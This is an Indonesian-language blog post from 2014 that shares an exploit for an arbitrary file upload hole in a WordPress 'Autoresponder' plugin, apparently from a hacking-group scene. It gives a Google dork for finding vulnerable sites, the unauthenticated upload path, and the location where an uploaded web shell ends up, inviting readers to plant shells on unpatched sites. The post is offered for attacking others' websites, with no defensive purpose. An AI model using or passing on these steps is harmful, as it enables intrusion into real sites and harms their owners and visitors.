Exploit WordPress plugins Autoresponder File Upload

Anonim

Sabtu, 10 Mei 2014

Halo semuanya, kali ini ane mau share exploit yang ane dapet dari salah satu teman kita, yaitu Nabilah Dot ID

Oke langsung saja ane share exploitnya :

Exploit Title: WordPress plugins Autoresponder File Upload
Google Dork:
inurl:/autoresponder/jscolor/
Untuk dork lain kembangkan sendiri, use your brain ;)

Exploit :
[localhost]/wp-content/plugins/autoresponder/media-upload.php
Jika belum di patch, disitu kalian bisa langsung upload shell kalian tanpa harus tamper data :D
Nah, nanti shell akan terletak di
[localhost]/wp-content/uploads/svp/headerimage/random.php (look this view source)
Example [localhost]/wp-content/uploads/svp/headerimage/2014051020-00-00b37.php

Sekian tutorial kali ini, semoga bermanfaat .

########################################
#Thanks : Ismail Attacker | Malware Dot ID | Nabilah Dot ID | JKTP | 4in9 | All member JCA Team
########################################

Title : Exploit WordPress plugins Autoresponder File Upload
Description : Halo semuanya, kali ini ane mau share exploit yang ane dapet dari salah satu teman kita, yaitu Nabilah Dot ID Oke langsung saja ane sha...
Rating : 5